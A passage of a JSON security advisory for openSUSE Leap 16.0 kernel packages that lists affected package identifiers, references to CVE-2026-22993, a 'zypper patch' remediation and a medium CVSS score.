"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
